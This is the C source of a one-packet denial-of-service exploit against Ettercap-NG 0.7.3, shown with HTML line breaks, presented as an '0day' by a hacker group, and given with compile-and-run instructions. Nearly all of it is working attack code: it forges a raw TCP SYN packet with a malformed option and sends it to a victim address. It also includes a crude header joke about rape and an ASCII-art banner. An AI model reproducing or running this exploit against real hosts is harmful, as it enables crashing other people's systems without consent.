/*<br> WARNING WARNING WARNING <br><br> THIS PACKAGE CONTAINS AN 0DAY. <br> NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR MOLESTS YOUR DOG.<br> <br> WARNING WARNING WARNING<br><br><br>
THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE!<br> <br> If you want to know how this works then figure it out yourself. <br> Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1<br><br>
greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated, xtaylor, and rest of global hell,riot, JxT, <br> p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for fucking french women and anyone else I forgot..
<br><br> REMEBER KIDS EVILRABBI LOVES YOU :*.<br> <br> gcc -Wall -o b4b0-ettercap b4b0-ettercap.c<br> ./b4b0-ettercap <victim_ip><br><br>*/<br><br>#include <stdio.h><br>#include <stdlib.h><br>
#include <sys/types.h><br>#include <sys/socket.h><br>#include <linux/ip.h><br>#include <linux/tcp.h><br>#include <netinet/in.h><br>#include <arpa/inet.h><br>#include <unistd.h><br>
#include <string.h><br>#include <netdb.h><br><br>#define IP struct iphdr<br>#define TCP struct tcphdr<br><br>void usage();<br>unsigned short ipChecksum(unsigned short *ptr, int nbytes);
<br><br>void usage()<br>{<br>int i;<br>for (i=0; i < 100; i++) { printf("\n");}<br><br> printf(" VVVVVVVVVVV VVVVVVVVVVV\n");<br> printf(" VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV\n");
<br> printf(" VVVVVVVVVV VVVVVVV\n");<br> printf(" VVVVVVVVV b4b0-ettercap.c VVVVVVV\n");<br> printf(" . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a,\n");
<br> printf(" $$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P\"' `\"Y8, . \n");<br> printf(" yxxx.$$.xxxxxxxxxxxx ,d$\"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg \n");
<br> printf(" $ P' $$,d$$Yba, ,d$\" d $$ $$,d$$Yba, 88 ,$.$$$ $ \n");<br> printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ \n");
<br> printf(" $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ \n");<br> printf(" bxxx.$$$, '`,d$\".xxxxxxxx.$$.x.$$b, ',a$$\".x`8ba,,aad$$'.xxxxd. . \n");
<br> printf(" s$Y\"Y$bd$P',yas.VVVV s$$z $Y\"Y$$$P\"' \"Y$$$$(headflux)$ \n");<br> printf(" VVVVVVVV VVVVVVVV \n");<br> printf(" VVVVVVVV VVVVVVVV \n");
<br> printf(" ettercap-ng v0.7.3 VVVVVVVV VVVVVVVV \n");<br> printf(" Denial of Service VVVVVVVVVVVVVVVV \n");<br> printf(" by EvilRabbi VVVVVVVVVVVVVV \n");<br>
printf(" <evilrabbi[@]gmail.com VVVVVVVVVVVV \n");<br> printf(" VVVVVVVVVV \n");<br> printf(" VVVVVVVV \n");<br> printf("./b4b0-ettercap <victim ip> VVVVVV \n");
<br> printf(" VVVV \n");<br> printf(" VV \n");<br>}<br>unsigned short ipChecksum(unsigned short *ptr, int nbytes)<br>{<br> register long sum;
<br> register u_short answer;<br> u_short oddbyte;<br><br> sum = 0;<br><br> while (nbytes > 1) {<br> sum += *ptr++;<br> nbytes -= 2;<br> }<br><br> if (nbytes == 1) {
<br> oddbyte = 0;<br> *((u_char *) & oddbyte) = *(u_char *) ptr;<br> sum += oddbyte;<br> }<br><br> sum = (sum >> 16) + (sum & 0xffff);<br> sum += (sum >> 16);
<br> answer = ~sum;<br>return (answer);<br>}<br><br>int main(int argc, char **argv)<br>{<br> int sockfd, opt = 1; <br> char tcpoptions[4];<br> char dest[20];<br> unsigned int pLen,sIPLen;<br> unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)];
<br> unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)];<br> struct hostent *he;<br> struct sockaddr_in host;<br> struct sockaddr_in s;<br><br> struct in_addr etter; <br> IP *iphdr = (IP *)pkt;<br> TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP));
<br><br> if (getuid() != 0) {<br> printf("you need to be r00t =(\n");<br> exit(0);<br> }<br><br> if (argc != 2) {<br> usage();<br> exit(0);<br> }<br> if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
<br> herror("gethostbyname");<br> exit(1);<br> } <br> snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned char)he->h_addr_list[0][0], <br> (unsigned char)he->h_addr_list[0][1],
<br> (unsigned char)he->h_addr_list[0][2],<br> (unsigned char)he->h_addr_list[0][3]);<br><br> if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) {
<br> perror("socket");<br> exit(1);<br> }<br> setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt));<br><br> etter.s_addr = inet_addr(dest);<br> s.sin_addr.s_addr = INADDR_ANY;
<br> //etter.s_addr = inet_addr("<a href="http://69.46.19.77">69.46.19.77</a>");<br> memset(tcpoptions,0,sizeof(tcpoptions));<br> tcpoptions[0]=0x08;<br> tcpoptions[1]=0x00;<br> tcpoptions[2]=0x00;
<br> tcpoptions[3]=0x00;<br> <br> memset(&host, 0, sizeof(host));<br> memset(pkt, 0, pLen);<br> memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions));<br> memset(ip, 0, sIPLen);<br> *((unsigned long *)((unsigned char *)ip+0)) =
s.sin_addr.s_addr;<br> *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr;<br> *((unsigned char *)((unsigned char *)ip+8)) = 0;<br> *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP;<br> *((unsigned short *)((unsigned char *)ip+10)) = htons(pLen - sizeof(IP));
<br> iphdr->version = 4;<br> iphdr->ihl = 5;<br> iphdr->id = rand() & 0xFFFF;<br> iphdr->id = iphdr->id + 1;<br> iphdr->saddr = s.sin_addr.s_addr;<br> iphdr->daddr =
etter.s_addr;<br> iphdr->protocol = IPPROTO_TCP; <br> iphdr->ttl = 255;<br> iphdr->tot_len = pLen;<br> iphdr->check = ipChecksum((u_short *)iphdr, sizeof(IP));<br><br> host.sin_family
= AF_INET;<br> host.sin_addr.s_addr = etter.s_addr;<br><br> tcphdr->source = htons(8);<br> tcphdr->dest = htons(1);<br> tcphdr->seq = htonl(rand());<br> tcphdr->ack_seq = htonl(rand());
<br> tcphdr->doff = ((sizeof(TCP)+4) / 4);<br> tcphdr->check=0;<br> tcphdr->fin = 0;<br> tcphdr->syn = 1;<br> tcphdr->rst = 0;<br> tcphdr->psh = 0;<br> tcphdr->ack = 0;
<br> tcphdr->urg = 0;<br> tcphdr->window = htons(5840);<br> memcpy(ip+12, ((unsigned char *)pkt)+sizeof(IP), pLen - sizeof(IP));<br> tcphdr->check = ipChecksum((u_short *)&ip, sIPLen);<br> <br>
sendto(sockfd, pkt, pLen, 0, (struct sockaddr *)&host, sizeof(host));<br><br> return 0;<br>}<br>